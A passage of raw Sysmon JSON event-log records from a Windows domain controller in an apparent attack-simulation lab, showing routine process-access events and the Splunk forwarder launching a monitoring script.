indows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3578,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.076\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.076","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3579,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.076\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.076","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3580,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.188\r\nProcessGuid: {A837DB8D-023D-5F25-0000-0010A25F0500}\r\nProcessId: 4840\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinPrintMon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.188","ProcessGuid":"{A837DB8D-023D-5F25-0000-0010A25F0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinPrintMon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3581,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.186\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 4232\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-023D-5F25-0000-0010A25F0500}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.186","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"4232","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-023D-5F25-0000-0010A25F0500}","TargetProcessId":"4840","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3582,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.186\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023D-5F25-0000-0010A25F0500}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.186","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023D-5F25-0000-0010A25F0500}","TargetProcessId":"4840","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3583,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.186\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.186","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3584,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.186\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.186","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3585,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.186\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.186","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3586,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.186\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 